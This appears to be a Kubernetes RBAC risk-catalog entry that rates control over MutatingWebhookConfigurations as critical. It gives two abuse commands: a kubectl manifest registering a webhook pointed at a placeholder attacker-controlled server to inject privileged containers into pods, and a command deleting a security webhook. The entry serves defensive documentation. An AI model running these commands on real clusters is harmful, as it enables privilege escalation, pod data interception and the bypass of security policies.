Manage MutatingWebhookConfigurations
Tampering
Critical
Overview
| Field | Value |
|---|---|
| ID | 1043 |
| Name | Manage MutatingWebhookConfigurations |
| Risk Category | Tampering |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | admissionregistration.k8s.io |
| Resources | mutatingwebhookconfigurations |
| Verbs | create, update, patch, delete |
| Tags | DenialOfService PrivilegeEscalation Tampering WebhookManipulation |
Description
Grants control over MutatingWebhookConfigurations, which can modify API objects during admission. This is extremely critical as an attacker can create or alter webhooks to inject malicious configurations, escalate privileges, bypass security policies, or cause denial of service.
Abuse Scenarios
- Create a new MutatingWebhookConfiguration to inject privileged containers into pods.
kubectl create -f - <<EOF
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
name: privileged-injector
webhooks:
- name: privileged-injector.example.com
clientConfig:
url: "https://<malicious-webhook-server>/mutate" # Attacker-controlled server
caBundle: <base64-encoded-ca-cert> # Self-signed CA for attacker's server
rules:
- operations: ["CREATE"]
apiGroups: [""]
apiVersions: ["v1"]
resources: ["pods"]
admissionReviewVersions: ["v1", "v1beta1"]
sideEffects: None
failurePolicy: Ignore # To avoid breaking legitimate operations
EOF
# Example: kubectl create -f - <<EOF ... EOF
- Delete a critical MutatingWebhookConfiguration, potentially bypassing security policies.
kubectl delete mutatingwebhookconfiguration <webhook-name>
# Example: kubectl delete mutatingwebhookconfiguration pod-defaults-webhook